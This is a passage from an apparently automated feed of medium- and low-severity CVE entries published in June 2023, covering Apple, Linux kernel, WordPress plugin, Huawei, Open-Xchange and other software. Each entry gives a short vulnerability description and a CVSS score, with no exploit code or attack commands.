A privacy issue was addressed with improved private data redaction for log entries.

5.5
2023-06-23 CVE-2023-32395 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32399 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved handling of caches.

5.5
2023-06-23 CVE-2023-32400 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved checks.

5.5
2023-06-23 CVE-2023-32403 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-32404 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32407 Apple Unspecified vulnerability in Apple products

A logic issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32408 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved handling of caches.

5.5
2023-06-23 CVE-2023-32410 Apple Out-of-bounds Read vulnerability in Apple Ipados and Macos

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32411 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32415 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-32422 Apple Unspecified vulnerability in Apple products

This issue was addressed by adding additional SQLite logging restrictions.

5.5
2023-06-23 CVE-2023-35925 Intellectualsites Resource Exhaustion vulnerability in Intellectualsites Fastasyncworldedit

FastAsyncWorldEdit (FAWE) is designed for efficient world editing.

5.5
2023-06-22 CVE-2023-33842 IBM Unspecified vulnerability in IBM Spss Modeler

IBM SPSS Modeler on Windows 17.0, 18.0, 18.2.2, 18.3, 18.4, and 18.5 requires the end user to have access to the server SSL key which could allow a local user to decrypt and obtain sensitive information.

5.5
2023-06-21 CVE-2023-25435 Libtiff Classic Buffer Overflow vulnerability in Libtiff 4.5.0

libtiff 4.5.0 is vulnerable to Buffer Overflow via extractContigSamplesShifted8bits() at /libtiff/tools/tiffcrop.c:3753.

5.5
2023-06-20 CVE-2023-3220 Linux NULL Pointer Dereference vulnerability in Linux Kernel

An issue was discovered in the Linux kernel through 6.1-rc8.

5.5
2023-06-19 CVE-2023-3022 Linux Type Confusion vulnerability in Linux Kernel

A flaw was found in the IPv6 module of the Linux kernel.

5.5
2023-06-19 CVE-2023-29532 Mozilla Unspecified vulnerability in Mozilla Firefox

A local attacker can trick the Mozilla Maintenance Service into applying an unsigned update file by pointing the service at an update file on a malicious SMB server.

5.5
2023-06-19 CVE-2023-35866 Keepassxc Unspecified vulnerability in Keepassxc

In KeePassXC through 2.7.5, a local attacker can make changes to the Database security settings, including master password and second-factor authentication, within an authenticated KeePassXC Database session, without the need to authenticate these changes by entering the password and/or second-factor authentication to confirm changes.

5.5
2023-06-24 CVE-2023-3387 Lanacodes Unspecified vulnerability in Lanacodes Lana Text to Image 1.0.0

The Lana Text to Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lana_text_to_image' and 'lana_text_to_img' shortcode in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-06-24 CVE-2023-1724 Ladybirdweb Cross-site Scripting vulnerability in Ladybirdweb Faveo Helpdesk

Faveo Helpdesk Enterprise version 6.0.1 allows an attacker with agent permissions to perform privilege escalation on the application.

5.4
2023-06-23 CVE-2023-3394 Fossbilling Session Fixation vulnerability in Fossbilling

Session Fixation in GitHub repository fossbilling/fossbilling prior to 0.5.1.

5.4
2023-06-23 CVE-2023-27964 Apple Authentication Bypass by Spoofing vulnerability in Apple Airpods Firmware 5E133

An authentication issue was addressed with improved state management.

5.4
2023-06-23 CVE-2023-35153 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

5.4
2023-06-23 CVE-2023-34464 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

5.4
2023-06-23 CVE-2023-36288 Webkul Cross-site Scripting vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via GET configure parameter.

5.4
2023-06-23 CVE-2023-3304 Admidio Unspecified vulnerability in Admidio

Improper Access Control in GitHub repository admidio/admidio prior to 4.2.9.

5.4
2023-06-22 CVE-2023-36093 Eyoucms Cross-site Scripting vulnerability in Eyoucms 1.6.3

There is a stored cross-site scripting (XSS) vulnerability in the filing number field of the Basic Information tab on the backend management page of EyouCMS v1.6.3.

5.4
2023-06-22 CVE-2023-28418 Mediciti Lite Project Cross-site Scripting vulnerability in Mediciti Lite Project Mediciti Lite

Auth.

5.4
2023-06-22 CVE-2023-32239 Xtemos Cross-site Scripting vulnerability in Xtemos Woodmart Theme

Auth.

5.4
2023-06-22 CVE-2023-31868 Sage Cross-site Scripting vulnerability in Sage X3 12.14.0.500

Sage X3 version 12.14.0.50-0 is vulnerable to Cross Site Scripting (XSS).

5.4
2023-06-22 CVE-2023-31213 Wpbakery Cross-site Scripting vulnerability in Wpbakery Page Builder

Auth.

5.4
2023-06-22 CVE-2023-35090 Stylemixthemes Cross-site Scripting vulnerability in Stylemixthemes Masterstudy LMS

Auth.

5.4
2023-06-22 CVE-2023-28171 Wpchill Cross-site Scripting vulnerability in Wpchill Brilliance

Auth.

5.4
2023-06-22 CVE-2023-28534 Wpjobportal Cross-site Scripting vulnerability in Wpjobportal WP JOB Portal

Auth.

5.4
2023-06-22 CVE-2023-27413 W4 Post List Project Cross-site Scripting vulnerability in W4 Post List Project W4 Post List

Auth.

5.4
2023-06-22 CVE-2023-27612 Geminilabs Cross-site Scripting vulnerability in Geminilabs Site Reviews

Auth.

5.4
2023-06-22 CVE-2023-27629 Geminilabs Cross-site Scripting vulnerability in Geminilabs Site Reviews

Auth.

5.4
2023-06-22 CVE-2023-27631 Daily Prayer Time Project Cross-site Scripting vulnerability in Daily Prayer Time Project Daily Prayer Time

Auth.

5.4
2023-06-21 CVE-2023-27443 Simple Vimeo Shortcode Project Cross-site Scripting vulnerability in Simple Vimeo Shortcode Project Simple Vimeo Shortcode

Auth.

5.4
2023-06-20 CVE-2020-21246 Yiicms Project Cross-site Scripting vulnerability in Yiicms Project Yiicms 1.0

Cross Site Scripting vulnerability in YiiCMS v.1.0 allows a remote attacker to execute arbitrary code via the news function.

5.4
2023-06-20 CVE-2023-35882 Heateor Cross-site Scripting vulnerability in Heateor Super Socializer

Auth.

5.4
2023-06-19 CVE-2023-34461 Pybb Project Cross-site Scripting vulnerability in Pybb Project Pybb 0.1.0

PyBB is an open source bulletin board.

5.4
2023-06-19 CVE-2023-35776 Bearsthemes Cross-site Scripting vulnerability in Bearsthemes Sermons Online

Auth.

5.4
2023-06-19 CVE-2023-3318 Resort Management System Project Cross-site Scripting vulnerability in Resort Management System Project Resort Management System 1.0

A vulnerability was found in SourceCodester Resort Management System 1.0.

5.4
2023-06-19 CVE-2023-0368 Responsive Tabs FOR Wpbakery Page Builder Project Cross-site Scripting vulnerability in Responsive Tabs for Wpbakery Page Builder Project Responsive Tabs for Wpbakery Page Builder

The Responsive Tabs For WPBakery Page Builder (formerly Visual Composer) WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

5.4
2023-06-19 CVE-2023-0489 Slideonline Project Unspecified vulnerability in Slideonline Project Sideonline

The SlideOnline WordPress plugin through 1.2.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

5.4
2023-06-19 CVE-2023-2899 WEB Argument Unspecified vulnerability in Web-Argument Google MAP Shortcode

The Google Map Shortcode WordPress plugin through 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks that could be used against high-privilege users such as admin.

5.4
2023-06-22 CVE-2023-2991 Globalscape Unspecified vulnerability in Globalscape EFT Server

Fortra Globalscape EFT's administration server suffers from an information disclosure vulnerability where the serial number of the hard drive that Globalscape is installed on can be remotely determined via a "trial extension request" message.

5.3
2023-06-20 CVE-2023-26429 Open Xchange Command Injection vulnerability in Open-Xchange Appsuite Backend

Control characters were not removed when exporting user feedback content.

5.3
2023-06-19 CVE-2022-48488 Huawei Incorrect Authorization vulnerability in Huawei Emui

Vulnerability of bypassing the default desktop security controls. Successful exploitation of this vulnerability may cause unauthorized modifications to the desktop.

5.3
2023-06-19 CVE-2022-48491 Huawei Missing Authorization vulnerability in Huawei Emui

Vulnerability of missing authentication on certain HUAWEI phones. Successful exploitation of this vulnerability can lead to ads and other windows being displayed at any time.

5.3
2023-06-19 CVE-2022-48495 Huawei Incorrect Authorization vulnerability in Huawei Emui 12.0.0/12.0.1/13.0.0

Vulnerability of unauthorized access to foreground app information. Successful exploitation of this vulnerability may cause foreground app information to be obtained.

5.3
2023-06-19 CVE-2023-34156 Huawei Unspecified vulnerability in Huawei Emui

Vulnerability of services denied by early fingerprint APIs on HarmonyOS products. Successful exploitation of this vulnerability may cause services to be denied.

5.3
2023-06-19 CVE-2023-34158 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui 12.0.0/13.0.0

Vulnerability of spoofing trustlists of Huawei desktop. Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

5.3
2023-06-19 CVE-2023-34160 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui 12.0.0/13.0.0

Vulnerability of spoofing trustlists of Huawei desktop. Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

5.3
2023-06-19 CVE-2023-34167 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui

Vulnerability of spoofing trustlists of Huawei desktop. Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

5.3
2023-06-19 CVE-2023-2751 Upload Resume Project Unspecified vulnerability in Upload Resume Project Upload Resume

The Upload Resume WordPress plugin through 1.2.0 does not validate the captcha parameter when uploading a resume via the resume_upload_form shortcode, allowing unauthenticated visitors to upload arbitrary media files to the site.

5.3
2023-06-19 CVE-2023-32208 Mozilla Unspecified vulnerability in Mozilla Firefox

Service workers could reveal script base URL due to dynamic `import()`.

5.3
2023-06-23 CVE-2023-35163 Gobalsky Improper Input Validation vulnerability in Gobalsky Vega

Vega is a decentralized trading platform that allows pseudo-anonymous trading of derivatives on a blockchain.

5.2
2023-06-20 CVE-2023-26435 Open Xchange Server-Side Request Forgery (SSRF) vulnerability in Open-Xchange Appsuite Backend

It was possible to call filesystem and network references using the local LibreOffice instance using manipulated ODT documents.

5.0
2023-06-23 CVE-2023-35157 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

4.8
2023-06-23 CVE-2023-27427 Ntzapps Cross-site Scripting vulnerability in Ntzapps CRM Memberships

Auth.

4.8
2023-06-23 CVE-2023-28751 Wpmet Cross-site Scripting vulnerability in Wpmet WP Ultimate Review 2.0.3

Auth.

4.8
2023-06-23 CVE-2023-32580 Wpexperts Cross-site Scripting vulnerability in Wpexperts Password Protected

Auth.

4.8
2023-06-23 CVE-2023-35048 Magepeople Cross-site Scripting vulnerability in Magepeople Booking & Rental Manager

Auth.

4.8
2023-06-22 CVE-2023-30347 STL Cross-site Scripting vulnerability in STL Neox Dial Centre 2.3.9

Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search.

4.8
2023-06-22 CVE-2023-34170 Wpovernight Cross-site Scripting vulnerability in Wpovernight Download Quick/Bulk Order Form for Woocommerce

Auth.

4.8
2023-06-22 CVE-2023-28774 Grade Cross-site Scripting vulnerability in Grade Review Stream

Auth.

4.8
2023-06-22 CVE-2023-33323 Reputeinfosystems Cross-site Scripting vulnerability in Reputeinfosystems Armember

Auth.

4.8
2023-06-22 CVE-2023-34006 Telegram BOT Channel Project Cross-site Scripting vulnerability in Telegram BOT & Channel Project Telegram BOT & Channel

Auth.

4.8
2023-06-22 CVE-2023-34368 Kanbanwp Cross-site Scripting vulnerability in Kanbanwp Kanban Boards

Auth.

4.8
2023-06-22 CVE-2023-23807 Qumos Cross-site Scripting vulnerability in Qumos Mojoplug Slide Panel

Auth.

4.8
2023-06-22 CVE-2023-23811 Smoothscroller Project Cross-site Scripting vulnerability in Smoothscroller Project Smoothscroller

Auth.

4.8
2023-06-22 CVE-2023-26534 Onewebsite Cross-site Scripting vulnerability in Onewebsite WP Repost

Auth.

4.8
2023-06-22 CVE-2023-26539 Advanced Text Widget Project Cross-site Scripting vulnerability in Advanced Text Widget Project Advanced Text Widget

Auth.

4.8
2023-06-22 CVE-2023-27452 WOW Estore Cross-site Scripting vulnerability in Wow-Estore Button Generator - Easily Button Builder

Auth.

4.8
2023-06-22 CVE-2023-28174 Elightup Cross-site Scripting vulnerability in Elightup Erocket

Auth.

4.8
2023-06-22 CVE-2023-28778 Bestwebsoft Cross-site Scripting vulnerability in Bestwebsoft Pagination

Auth.

4.8
2023-06-22 CVE-2023-29707 Gbcom Cross-site Scripting vulnerability in Gbcom LAC web Control Center Lac1.3.X

Cross Site Scripting (XSS) vulnerability in GBCOM LAC WEB Control Center version lac-1.3.x, allows attackers to create an arbitrary device.

4.8
2023-06-22 CVE-2023-27618 Agilelogix Cross-site Scripting vulnerability in Agilelogix Store Locator

Auth.

4.8
2023-06-22 CVE-2023-28423 Prismtechstudios Cross-site Scripting vulnerability in Prismtechstudios Modern Footnotes

Auth.

4.8
2023-06-22 CVE-2023-28496 Smtp2Go Cross-site Scripting vulnerability in Smtp2Go

Auth.

4.8
2023-06-22 CVE-2023-28695 Vigilantor Project Cross-site Scripting vulnerability in Vigilantor Project Vigilantor

Auth.

4.8
2023-06-21 CVE-2023-27429 Automattic Cross-site Scripting vulnerability in Automattic Jetpack CRM

Auth.

4.8
2023-06-21 CVE-2023-27439 NEW Adman Project Cross-site Scripting vulnerability in NEW Adman Project NEW Adman 1.6.7.2/1.6.8

Auth.

4.8
2023-06-20 CVE-2020-20697 Nodcms Cross-site Scripting vulnerability in Nodcms 3.0

Cross Site Scripting vulnerability in khodakhah NodCMS v.3.0 allows a remote attacker to execute arbitrary code and gain access to sensitive information via a crafted script to the address parameter.

4.8
2023-06-20 CVE-2023-35095 Flothemes Cross-site Scripting vulnerability in Flothemes FLO Forms

Auth.

4.8
2023-06-20 CVE-2023-35878 Extra User Details Project Cross-site Scripting vulnerability in Extra User Details Project Extra User Details

Auth.

4.8
2023-06-19 CVE-2023-35779 Seedwebs Cross-site Scripting vulnerability in Seedwebs Seed Fonts

Auth.

4.8
2023-06-19 CVE-2023-33213 Gvectors Cross-site Scripting vulnerability in Gvectors Wpview

Auth.

4.8
2023-06-19 CVE-2023-2401 Qudata Unspecified vulnerability in Qudata Qubot

The QuBot WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

4.8
2023-06-19 CVE-2023-2527 Crmperks Cross-site Scripting vulnerability in Crmperks Integration for Contact Form 7 and Zoho Crm, Bigin 1.2.2

The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.

4.8
2023-06-19 CVE-2023-2600 Artprojectgroup Unspecified vulnerability in Artprojectgroup Custom Base Terms

The Custom Base Terms WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

4.8
2023-06-19 CVE-2023-2684 Wpfactory Unspecified vulnerability in Wpfactory File Renaming on Upload

The File Renaming on Upload WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

4.8
2023-06-19 CVE-2023-2742 Quantumcloud Unspecified vulnerability in Quantumcloud AI Chatbot

The AI ChatBot WordPress plugin before 4.5.5 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

4.8
2023-06-19 CVE-2023-2811 Quantumcloud Unspecified vulnerability in Quantumcloud AI Chatbot

The AI ChatBot WordPress plugin before 4.5.6 does not sanitise and escape numerous of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks against all admins when configuring the chatbot and against all clients when using the chatbot.

4.8
2023-06-19 CVE-2023-2812 Ultimate Dashboard Project Unspecified vulnerability in Ultimate Dashboard Project Ultimate Dashboard

The Ultimate Dashboard WordPress plugin before 3.7.6 does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

4.8
2023-06-19 CVE-2023-34657 Eyoucms Cross-site Scripting vulnerability in Eyoucms 1.6.2

A stored cross-site scripting (XSS) vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter.

4.8
2023-06-23 CVE-2023-32391 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved checks.

4.6
2023-06-23 CVE-2023-28064 Dell Out-of-bounds Write vulnerability in Dell products

Dell BIOS contains an Out-of-bounds Write vulnerability.

4.6
2023-06-23 CVE-2023-3212 Linux, Fedoraproject, Redhat, Debian, Netapp NULL Pointer Dereference vulnerability in multiple products

A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel.

4.4
2023-06-23 CVE-2023-35931 Shescape Project Information Exposure Through Environmental Variables vulnerability in Shescape Project Shescape

Shescape is a simple shell escape library for JavaScript.

4.3
2023-06-23 CVE-2022-42807 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

4.3
2023-06-23 CVE-2023-34466 Xwiki Information Exposure vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

4.3
2023-06-22 CVE-2023-25500 Vaadin Information Exposure vulnerability in Vaadin

Possible information disclosure in Vaadin 10.0.0 to 10.0.23, 11.0.0 to 14.10.1, 15.0.0 to 22.0.28, 23.0.0 to 23.3.13, 24.0.0 to 24.0.6, 24.1.0.alpha1 to 24.1.0.rc2, resulting in potential information disclosure of class and method names in RPC responses by sending modified requests.

4.3
2023-06-20 CVE-2023-26431 Open Xchange Server-Side Request Forgery (SSRF) vulnerability in Open-Xchange Appsuite Backend

IPv4-mapped IPv6 addresses were not recognized as "local" by the code, so a connection attempt was made.

4.3
2023-06-20 CVE-2023-26432 Open Xchange Unspecified vulnerability in Open-Xchange Appsuite Backend

When adding an external mail account, processing of SMTP "capabilities" responses is not limited to plausible sizes.

4.3
2023-06-20 CVE-2023-26433 Open Xchange Unspecified vulnerability in Open-Xchange Appsuite Backend

When adding an external mail account, processing of IMAP "capabilities" responses is not limited to plausible sizes.

4.3
2023-06-20 CVE-2023-26434 Open Xchange Unspecified vulnerability in Open-Xchange Appsuite Backend

When adding an external mail account, processing of POP3 "capabilities" responses is not limited to plausible sizes.

4.3
2023-06-19 CVE-2023-3315 Jenkins Missing Authorization vulnerability in Jenkins Team Concert

Missing permission checks in Jenkins Team Concert Plugin 2.4.1 and earlier allow attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

4.3

14 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-23 CVE-2023-3303 Admidio Improper Access Control vulnerability in Admidio

Improper Access Control in GitHub repository admidio/admidio prior to 4.2.9.

3.5
2023-06-21 CVE-2023-0969 Silabs Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Silabs Z/Ip Gateway SDK

A vulnerability in SiLabs Z/IP Gateway 7.18.01 and earlier allows an authenticated attacker within Z-Wave range to manipulate an array pointer to disclose the contents of global memory.

3.5
2023-06-23 CVE-2022-42834 Apple Unspecified vulnerability in Apple Macos

An access issue was addressed with improved access restrictions.

3.3
2023-06-23 CVE-2023-32386 Apple Unspecified vulnerability in Apple Macos

A privacy issue was addressed with improved handling of temporary files.

3.3
2023-06-23 CVE-2023-32464 Dell Improper Certificate Validation vulnerability in Dell products

Dell VxRail, versions prior to 7.0.450, contain an improper certificate validation vulnerability.

3.3
2023-06-20 CVE-2023-26427 Open Xchange Incorrect Permission Assignment for Critical Resource vulnerability in Open-Xchange Appsuite Backend

Default permissions for a properties file were too permissive.

3.3
2023-06-19 CVE-2023-34414 Mozilla Improper Certificate Validation vulnerability in Mozilla Firefox

The error page for sites with invalid TLS certificates was missing the activation-delay Firefox uses to protect prompts and permission dialogs from attacks that exploit human response time delays.

3.1
2023-06-22 CVE-2023-34110 Flask Appbuilder Project Information Exposure Through an Error Message vulnerability in Flask-Appbuilder Project Flask-Appbuilder

Flask-AppBuilder is an application development framework, built on top of Flask.

2.7
2023-06-20 CVE-2023-2400 Devolutions Incomplete Cleanup vulnerability in Devolutions Server

Improper deletion of resources in the user management feature in Devolutions Server 2023.1.8 and earlier allows an administrator to view the user vaults of deleted users via database access.

2.7
2023-06-23 CVE-2023-32365 Apple Unspecified vulnerability in Apple Ipados and Iphone OS

The issue was addressed with improved checks.

2.4
2023-06-23 CVE-2023-32390 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved checks.

2.4
2023-06-23 CVE-2023-32394 Apple Exposure of Resource to Wrong Sphere vulnerability in Apple products

The issue was addressed with improved checks.

2.4
2023-06-23 CVE-2023-32417 Apple Unspecified vulnerability in Apple Watchos

This issue was addressed by restricting options offered on a locked device.

2.4
2023-06-19 CVE-2022-48506 Dominionvoting Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Dominionvoting Democracy Suite

A flawed pseudorandom number generator in Dominion Voting Systems ImageCast Precinct (ICP and ICP2) and ImageCast Evolution (ICE) scanners allows anyone to determine the order in which ballots were cast from public ballot-level data, allowing deanonymization of voted ballots, in several types of scenarios.

2.4